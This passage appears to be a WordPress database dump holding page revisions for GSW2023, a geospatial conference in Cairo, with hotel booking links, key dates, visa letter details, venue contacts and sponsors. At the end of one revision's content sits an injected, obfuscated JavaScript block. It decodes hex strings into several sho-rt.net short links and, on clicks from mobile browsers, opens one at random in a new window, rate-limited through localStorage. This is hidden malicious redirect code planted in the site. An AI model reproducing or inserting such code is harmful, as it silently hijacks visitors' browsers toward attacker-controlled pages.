10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-21 23:50:08','2023-06-21 23:50:08','',3066,'https://gsw2023.com/?p=4737',0,'revision','',0),
(4738,1,'2023-06-21 23:51:34','2023-06-21 23:51:34','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a 